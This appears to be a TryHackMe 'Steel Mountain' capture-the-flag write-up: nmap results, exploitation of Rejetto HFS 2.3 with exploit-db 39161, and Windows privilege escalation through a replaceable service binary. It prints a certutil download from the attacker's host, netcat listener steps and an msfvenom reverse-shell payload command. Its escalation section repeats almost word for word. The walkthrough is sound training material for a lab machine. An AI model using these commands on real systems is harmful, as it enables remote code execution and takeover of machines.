CTF-Writeups/TryHackMe/steel_mountain.md
2020-10-27 02:51:49 +05:00

10 KiB

#TryHackMe-Steel Mountain

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT                                                                              [13/93]
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                                                                          
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)                                                                                       
Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                                                                          
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)                                                                                       
Nmap scan report for 10.10.252.157                                        
Host is up (0.18s latency).                                               
Not shown: 988 closed ports                                               
PORT      STATE SERVICE            VERSION                                
80/tcp    open  http               Microsoft IIS httpd 8.5                                                                                          
| http-methods:                                                           
|_  Potentially risky methods: TRACE                                      
|_http-server-header: Microsoft-IIS/8.5                                                                                                             
|_http-title: Site doesn't have a title (text/html).                                                                                                
135/tcp   open  msrpc              Microsoft Windows RPC                                                                                            
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn                                                                                    
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds                                                             
3389/tcp  open  ssl/ms-wbt-server?                                        
|_ssl-date: 2020-10-26T18:26:37+00:00; 0s from scanner time.                                                                                        
8080/tcp  open  http               HttpFileServer httpd 2.3                                                                                         
|_http-server-header: HFS 2.3                                             
|_http-title: HFS /                  
49152/tcp open  msrpc              Microsoft Windows RPC                                                                                            
49153/tcp open  msrpc              Microsoft Windows RPC                                                                                            
49154/tcp open  msrpc              Microsoft Windows RPC                                                                                            
49155/tcp open  msrpc              Microsoft Windows RPC                                                                                            
49156/tcp open  msrpc              Microsoft Windows RPC                                                                                            
49163/tcp open  msrpc              Microsoft Windows RPC                                                                                            
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows                                                            

Host script results:                 
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:84:f3:74:2b:f5 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)                                                                                
| smb-security-mode:                 
|   account_used: guest                
|   authentication_level: user                                            
|   challenge_response: supported                                         
|_  message_signing: disabled (dangerous, but default)                                                                                              
| smb2-security-mode:                
|   2.02:                            
|_    Message signing enabled but not required                            
| smb2-time:                         
|   date: 2020-10-26T18:26:30                                             
|_  start_date: 2020-10-26T18:21:06                                       

PORT 80

Who is the employee of the month?

Visit the web page on port 80 then look at the source of the web page and you'll image name which is the answer to the question.

Scan the machine with nmap. What is the other port running a web server on?

PORT 8080

PORT 8080

Clicking below at the link HttpFileServer 2.3 will redirect you to a page

Take a look at the other web server. What file server is running?

Rejetto Http File Server

What is the CVE number to exploit this file server?

Searchsploit

Now we know that it's using Rejetto Http File Server version 2.3 so let's find exploits for it

Let's try using this exploit

https://www.exploit-db.com/exploits/39161

Change the local IP and local port if you want doesn't matter if you use the default 443 port in this exploit

Now host the nc.exe on you local machine which can be downloaded from github https://github.com/int0x33/nc.exe/blob/master/nc.exe or if your using kali linux then it will be available to /usr/share/windows-resources/binaries/nc.exe

Hosting this file can be through python but remember to keep the port on 80 because that's the default port that http listens on

python3 -m http.server 80

Also set up a net cat listener nc -lvp [port]

Run the exploit with python2 39161 8080

Run it again because the first time you ran it just downloaded it but now when you run this exploit again it will execute nc.exe

Now upload winPEAS.exe on the machine for that host that file locally then download it on targeted machine

C:\Users\bill\Desktop>certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe
certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\bill\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of C:\Users\bill\Desktop

10/26/2020  02:31 PM    <DIR>          .
10/26/2020  02:31 PM    <DIR>          ..
10/26/2020  01:57 PM           600,580 PowerUp.ps1
09/27/2019  05:42 AM                70 user.txt
10/26/2020  02:31 PM           472,064 winpeas.exe
               3 File(s)      1,072,714 bytes
               2 Dir(s)  44,155,019,264 bytes free

C:\Users\bill\Desktop>

Now by simply typing .\winpeas.exe

We can see that this services can be exploited so let's generate a payload named as ASCService.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe

Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again

Stoppping the service

                                                                                                                                                    
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Starting the service

Metasploit

No we want to escalate our root privileges so we will run Powerup.ps1 powershell script to look for misconfigurations on targeted windows machine

To enter into powershell first write load powershell then powershell_shell

Run . .\PowerUp.ps1 and Invoke-AllChecks

Now check for service having canRestart set to True

And name of the service is AdvancedSystemCareService9

Now generate a payload with name ASCService.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe

Set up the netcat listener and stop that service after that upload it to the target machine and restart the service again

Stoppping the service

                                                                                                                                                    
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Starting the service